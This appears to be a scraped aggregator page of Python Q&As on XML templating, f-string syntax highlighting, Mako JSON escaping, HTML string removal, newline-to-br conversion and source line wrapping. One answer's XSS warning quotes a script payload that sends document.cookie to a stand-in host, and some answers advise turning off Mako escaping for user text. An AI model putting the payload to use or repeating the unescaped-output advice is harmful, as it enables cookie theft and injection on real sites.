Python inline of XML or ASCII string/template? - python

I am generating complex XML files through Python scripts that require a bunch of conditional statements (example http://repository.azgs.az.gov/uri_gin/azgs/dlio/536/iso19139.xml). I am working with multiple XML or ASCII metadata standards that often have poor schema or are quite vague.
In PHP, I just wrote out the XML and inserted PHP snippets where needed. Is there an easy way to do that in Python? I am trying to avoid having to escape all that XML. The inline method is also very helpful for tweaking the template without much rewrite.
I have looked a bit into Python templeting solutions but they appeared either too static or were overkill. Moving the whole XML into an XML object is a lot of work at a cost of flexibility when changing the XML or ASCII template.
Thanks for the newbie support!

wgrunberg,
I use Python's built-in string.Template class like so:
from string import Template
the_template = Template("<div id='$section_id'>First name: $first</div>")
print the_template.substitute(section_id="anID", first="Sarah")
The output of the above is:
<div id='anID'>First name: Sarah</div>
In the above example I showed an XML template, but any "template" that you can describe as a string would work.
To do conditionals you can do something like:
print the_template.substitute(section_id="theID", first="Sarah" if 0==0 else "John")
If your conditionals are complex, instead of expressing them inline as above, consider breaking them out into closures/functions.

Try any modern non-XML-based Python templating engine, e.g. Mako or Jinja2. They are fairly easy to integrate into your project, and then you will be able to write things such as:
<sometag>
%if a > b:
<anothertag />
%endif
</sometag>
You can also use inline python, including assignments.

#Gintautas' suggestion of using a good template engine would also be my first choice (especially Mako, whose "templating language" is basically Python plus some markup;-).
However, alternatives many people prefer to build XML files include writing them from the DOM, e.g. using (to stick with something in the standard library) ElementTree or (a third-party package, but zero trouble to install and very popular) BeautifulSoup (by all means stick with its 3.0.x release unless you're using Python 3!), specifically the BeautifulStoneSoup class (the BeautifulSoup class is for processing HTML, the stone one for XML).

Going for a template is the sensible thing to do. Using the build-in string template over external libraries would be my preferred method because I need to be able to pass on the Python ETL scripts easily to other people. However, I could get away with using templates by putting the XML string inside single quotes and using multi-line strings. Following is an example of this crude method.
for row in metadata_dictionary:
iso_xml = ''
iso_xml += ' *** a bunch of XML *** '
iso_xml += '\
<gmd:contact> \n\
<gmd:CI_ResponsibleParty> \n'
if row['MetadataContactName']:
iso_xml += '\
<gmd:individualName> \n\
<gco:CharacterString>'+row['MetadataContactName'].lower().strip()+'</gco:CharacterString> \n\
</gmd:individualName> \n'
if row['MetadataContactOrganisation']:
iso_xml += '\
<gmd:organisationName> \n\
<gco:CharacterString>'+row['MetadataContactOrganisation'].lower().strip()+'</gco:CharacterString> \n\
</gmd:organisationName> \n'
iso_xml += ' *** more XML *** '

Related

Sublime Text syntax: Python 3.6 f-strings

I am trying to modify the default Python.sublime_syntax file to handle Python’s f-string literals properly. My goal is to have expressions in interpolated strings recognised as such:
f"hello {person.name if person else 'there'}"
-----------source.python----------
------string.quoted.double.block.python------
Within f-strings, ranges of text between a single { and another } (but terminating before format specifiers such as !r}, :<5}, etc—see PEP 498) should be recognised as expressions. As far as I know, that might look a little like this:
...
string:
- match: "(?<=[^\{]\{)[^\{].*)(?=(!(s|r|a))?(:.*)?\})" # I'll need a better regex
push: expressions
However, upon inspecting the build-in Python.sublime_syntax file, the string contexts especially are to unwieldy to even approach (~480 lines?) and I have no idea how to begin. Thanks heaps for any info.
There was an update to syntax highlighting in BUILD 3127 (Which includes: Significant improvements to Python syntax highlighting).
However, a couple users have stated that in BUILD 3176 syntax highlighting still is not set to correctly highlight Python expressions that are located within f strings. According to #Jollywatt, it is set to source.python f"string.quoted.double.block {constant.other.placeholder}" rather than f"string.quoted.double.block {source.python}"
It looks like Sublime uses this tool, PackageDev, "to ease the creation of snippets, syntax definitions, etc. for Sublime Text."

" appears in JSONEncoder output, input is Python list of strings

I'm reading a text file, splitting it on \n and putting the results in a Python list.
I'm then using JSONEncoder().encode(mylist), but the result throws errors as it produces the javascript:
var jslist = ["List item 1", "List item 2"]
I'm guessing switching to single quotes would solve this, but it's unclear how to force JSONEncoder/python to use one or the other.
Update: The context is a pyramid application, here's the end of the function (components is the name of the list:
return {'components': JSONEncoder().encode(components)}
and then in the mako template:
var components = ${components};
which is being replaced as above.
mako is escaping your strings because it's a sane default for most purposes. You can turn off the escaping on a case-by-case basis:
${components | n}
If you are embedding the JSON on a HTML page, beware. As Mako does not know about script tags, so it goes on to escape the string using the standard escapes. However a <script> tag has different escaping rules. Notably, NOT escaping makes your site prone to Cross-Site Scripting attacks if the JSON contains user-generated data. Consider the following info in User-editable field (user.name)
user.name = "</script><script language='javascript'>" +
"document.write('<img src=\'http://ev1l.com/stealcookies/?'" +
"+ document.cookie + '/>');</script><script language='vbscript'>"
Alas, Python JSON encoder does not have an option for safely encoding JSON so that it
is embeddable within HTML - or even Javascript (a bug has been entered into Python bug db). Meanwhile you should use ensure_ascii=True + replace all '<' with '\\u003c' to avoid hacking by malicious users.

Searching for specific HTML string using Python

What modules would be the best to write a python program that searches through hundreds of html documents and deletes a certain string of html that is given.
For instance, if I have an html doc that has Test and I want to delete this out of every html page that has it.
Any help is much appreciated, and I don't need someone to write the program for me, just a helpful point in the right direction.
If the string you are searching for will be in the HTML literally, then simple string replacement will be fine:
old_html = open(html_file).read()
new_html = old_html.replace(my_string, "")
if new_html != old_html:
open(html_file, "w").write(new_html)
As an example of the string not being in the HTML literally, suppose you are looking for "Test" as you said. Do you want it to match these snippets of HTML?:
<a href='test.html'>Test</a>
<A HREF='test.html'>Test</A>
Test
Test
and so on: the "same" HTML can be expressed in many different ways. If you know the precise characters used in the HTML, then simple string replacement is fine. If you need to match at an HTML semantic level, then you'll need to use more advanced tools like BeautifulSoup, but then you'll also have potentially very different HTML output than you started with, even in the sections not affected by the deletion, because the entire file will have been parsed and reconstituted.
To execute code over many files, you'll find os.path.walk useful for finding files in a tree, or glob.glob for matching filenames to shell-like wildcard patterns.
BeautifulSoup or lxml.
htmllib
This module defines a class which can serve as a base for parsing text
files formatted in the HyperText Mark-up Language (HTML). The class is
not directly concerned with I/O — it must be provided with input in
string form via a method, and makes calls to methods of a “formatter”
object in order to produce output. The HTMLParser class is designed to
be used as a base class for other classes in order to add
functionality, and allows most of its methods to be extended or
overridden. In turn, this class is derived from and extends the
SGMLParser class defined in module sgmllib. The HTMLParser
implementation supports the HTML 2.0 language as described in RFC
1866.

Converting \n to <br> in mako files

I'm using python with pylons
I want to display the saved data from a textarea in a mako file with new lines formatted correctly for display
Is this the best way of doing it?
> ${c.info['about_me'].replace("\n", "<br />") | n}
The problem with your solution is that you bypass the string escaping, which can lead to security issues. Here is my solution :
<%! import markupsafe %>
${text.replace('\n', markupsafe.Markup('<br />'))}
or, if you want to use it more than once :
<%!
import markupsafe
def br(text):
return text.replace('\n', markupsafe.Markup('<br />'))
%>
${text | br }
This solution uses markupsafe, which is used by mako to mark safe strings and know which to escape. We only mark <br/> as being safe, not the rest of the string, so it will be escaped if needed.
It seems to me that is perfectly suitable.
Be aware that replace() returns a copy of the original string and does not modify it in place. So since this replacement is only for display purposes it should work just fine.
Here is a little visual example:
>>> s = """This is my paragraph.
...
... I like paragraphs.
... """
>>> print s.replace('\n', '<br />')
This is my paragraph.<br /><br />I like paragraphs.<br />
>>> print s
This is my paragraph.
I like paragraphs.
The original string remains unchanged. So... Is this the best way of doing it?
Ask yourself: Does it work? Did it get the job done quickly without resorting to horrible hacks? Then yes, it is the best way.
Beware as line breaks in <textarea>s should get submitted as \r\n according to http://www.w3.org/TR/REC-html40/interact/forms.html#h-17.13.4
To be safe, try s.replace('\r\n', '<br />') then s.replace('\n', '<br />').
This seems dangerous to me because it prints the whole string without escaping, which would allow arbitrary tags to be rendered. Make sure you cleanse the user's input with lxml or similar before printing. Beware that lxml will wrap in an HTML tag, it just can't handle things that aren't like that, so get ready to remove that manually or adjust your CSS to accommodate.
try this it will work:-
${c.info['about_me'] | n}
There is also a simply help function that can be called which will format and santize text correctly replacing \n for tags (see http://sluggo.scrapping.cc/python/WebHelpers/modules/html/converters.html).
In helpers.py add the following:
from webhelpers.html.converters import textilize
Then in your mako file simply say
h.textilize( c.info['about_me'], santize=True)
The santize=True just means that it will make sure any other nasty codes are escaped so users can't hack your site, as the default is False. Alternatively I make do a simple wrapper function in helpers so that santize=True is always defaults to True i.e.
from webhelpers.html.converters import textilize as unsafe_textilize
def textilize( value, santize=True):
return unsafe_textilize( value, santize )
This way you can just call h.textilize( c.info['about_me'] ) from your mako file, which if you work with lots of designers stops them from going crazy.

Sensible python source line wrapping for printout

I am working on a latex document that will require typesetting significant amounts of python source code. I'm using pygments (the python module, not the online demo) to encapsulate this python in latex, which works well except in the case of long individual lines - which simply continue off the page. I could manually wrap these lines except that this just doesn't seem that elegant a solution to me, and I prefer spending time puzzling about crazy automated solutions than on repetitive tasks.
What I would like is some way of processing the python source code to wrap the lines to a certain maximum character length, while preserving functionality. I've had a play around with some python and the closest I've come is inserting \\\n in the last whitespace before the maximum line length - but of course, if this ends up in strings and comments, things go wrong. Quite frankly, I'm not sure how to approach this problem.
So, is anyone aware of a module or tool that can process source code so that no lines exceed a certain length - or at least a good way to start to go about coding something like that?
You might want to extend your current approach a bit, but using the tokenize module from the standard library to determine where to put your line breaks. That way you can see the actual tokens (COMMENT, STRING, etc.) of your source code rather than just the whitespace-separated words.
Here is a short example of what tokenize can do:
>>> from cStringIO import StringIO
>>> from tokenize import tokenize
>>>
>>> python_code = '''
... def foo(): # This is a comment
... print 'foo'
... '''
>>>
>>> fp = StringIO(python_code)
>>>
>>> tokenize(fp.readline)
1,0-1,1: NL '\n'
2,0-2,3: NAME 'def'
2,4-2,7: NAME 'foo'
2,7-2,8: OP '('
2,8-2,9: OP ')'
2,9-2,10: OP ':'
2,11-2,30: COMMENT '# This is a comment'
2,30-2,31: NEWLINE '\n'
3,0-3,4: INDENT ' '
3,4-3,9: NAME 'print'
3,10-3,15: STRING "'foo'"
3,15-3,16: NEWLINE '\n'
4,0-4,0: DEDENT ''
4,0-4,0: ENDMARKER ''
I use the listings package in LaTeX to insert source code; it does syntax highlight, linebreaks et al.
Put the following in your preamble:
\usepackage{listings}
%\lstloadlanguages{Python} # Load only these languages
\newcommand{\MyHookSign}{\hbox{\ensuremath\hookleftarrow}}
\lstset{
% Language
language=Python,
% Basic setup
%basicstyle=\footnotesize,
basicstyle=\scriptsize,
keywordstyle=\bfseries,
commentstyle=,
% Looks
frame=single,
% Linebreaks
breaklines,
prebreak={\space\MyHookSign},
% Line numbering
tabsize=4,
stepnumber=5,
numbers=left,
firstnumber=1,
%numberstyle=\scriptsize,
numberstyle=\tiny,
% Above and beyond ASCII!
extendedchars=true
}
The package has hook for inline code, including entire files, showing it as figures, ...
I'd check a reformat tool in an editor like NetBeans.
When you reformat java it properly fixes the lengths of lines both inside and outside of comments, if the same algorithm were applied to Python, it would work.
For Java it allows you to set any wrapping width and a bunch of other parameters. I'd be pretty surprised if that didn't exist either native or as a plugin.
Can't tell for sure just from the description, but it's worth a try:
http://www.netbeans.org/features/python/

Categories

Resources